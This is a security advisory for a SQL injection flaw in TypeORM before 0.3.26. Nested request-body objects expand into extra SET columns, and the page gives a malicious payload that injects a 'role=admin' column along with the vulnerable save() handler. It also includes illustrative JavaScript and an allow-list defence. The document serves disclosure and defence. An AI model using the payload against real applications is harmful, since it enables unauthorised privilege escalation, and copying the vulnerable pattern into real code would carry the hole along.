PT-2025-45757 · Npm · Typeorm
Published 2025-10-29 · Updated 2025-10-29
CVSS v3.1: 6.5 (Medium)
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
Summary
SQL Injection vulnerability in TypeORM before 0.3.26 via a crafted request to repository.save or repository.update, because the underlying sqlstring call is made with the stringifyObjects option left at its default of false.
Details
Vulnerable Code:
```js
const { username, city, name } = req.body;
const updateData = {
  username,
  city,
  name,
  id: userId
}; // Developer aims to only allow the above three fields to be updated
const result = await userRepo.save(updateData);
```
Intended Payload (non-malicious):
username=myusername&city=Riga&name=Javad
OR
{username:"myusername",phone:12345,name:"Javad"}
SQL query produced:
```sql
UPDATE `user`
SET `username` = 'myusername',
    `city` = 'Riga',
    `name` = 'Javad'
WHERE `id` IN (1);
```
Malicious Payload:
username=myusername&city[name]=Riga&city[role]=admin
OR
{username:"myusername",city:{name:"Javad",role:"admin"}}
SQL query produced with Injected Column:
```sql
UPDATE `user`
SET `username` = 'myusername',
    `city` = `name` = 'Javad',
    `role` = 'admin'
WHERE `id` IN (1);
```
The above query is valid SQL: `city` = `name` = 'Javad' is parsed as assigning `city` the boolean result of the comparison `name` = 'Javad' (1 or 0) rather than a string, and the `role` column, which the developer never intended to expose, is injected and updated.

The underlying issue is that TypeORM used mysql2 without specifying a value for the stringifyObjects option. In both mysql and mysql2 this [option defaults to false](https://github.com/sidorares/node-mysql2/blob/e359f454a76ba5dc31b91adf7bdb4099ca317bb5/lib/connection_config.js#L124). The option is then passed through to the sqlstring library as false, so sqlstring does not stringify a nested object but expands it via objectToValues into a comma-separated list of `key` = value pairs, which is what turns one user-controlled field into arbitrary extra SET columns.
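The following added example (not TypeORM's or sqlstring's own code) models, in simplified form, how sqlstring renders a plain object when stringifyObjects is false, reproduces the injected SET clause shown above, and then shows the defender-side handling: allow-list the updatable fields and reject nested values before anything reaches repository.save or repository.update. The escapeValue helper, ALLOWED_FIELDS and pickScalarFields are assumptions introduced here for illustration.

```javascript
// Simplified model of sqlstring.escape for the types relevant to this advisory
// (assumption: the real library also handles Date, Buffer, etc.).
function escapeValue(val, stringifyObjects) {
  if (val === null || val === undefined) return 'NULL';
  if (typeof val === 'number' || typeof val === 'boolean') return String(val);
  if (typeof val === 'string') return "'" + val.replace(/'/g, "\\'") + "'";
  if (Array.isArray(val)) {
    return val.map((v) => escapeValue(v, stringifyObjects)).join(', ');
  }
  if (typeof val === 'object') {
    // stringifyObjects=true: the object is escaped as a string literal.
    if (stringifyObjects) return escapeValue(val.toString(), true);
    // stringifyObjects=false (the default): objectToValues expands the object
    // into `key` = value pairs, which is the column-injection primitive.
    return Object.keys(val)
      .map((k) => '`' + k + '` = ' + escapeValue(val[k], stringifyObjects))
      .join(', ');
  }
  return "'" + String(val) + "'";
}

// Builds a SET clause the way a per-column "`col` = ?" template would.
function buildSetClause(updateData, stringifyObjects = false) {
  return Object.keys(updateData)
    .map((k) => '`' + k + '` = ' + escapeValue(updateData[k], stringifyObjects))
    .join(', ');
}

// Hardened request handling: keep only allow-listed fields and only scalar
// values. Nested objects/arrays (the vector in this advisory) are rejected,
// so req.body can never smuggle an extra column such as `role`.
const ALLOWED_FIELDS = ['username', 'city', 'name'];
function pickScalarFields(body, allowed = ALLOWED_FIELDS) {
  const out = {};
  for (const key of allowed) {
    if (!(key in body)) continue;
    const v = body[key];
    if (v !== null && typeof v === 'object') {
      const kind = Array.isArray(v) ? 'array' : 'object';
      throw new TypeError(`field "${key}" must be a scalar, got ${kind}`);
    }
    out[key] = v;
  }
  return out;
}
```

With the malicious payload from the advisory, buildSetClause reproduces the injected `role` column, while pickScalarFields throws before any query is built; an equivalent allow-list plus type check belongs in the request handler in front of userRepo.save.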
Fix
SQL injection
Weakness Enumeration
Related Identifiers
Affected Products
Typeorm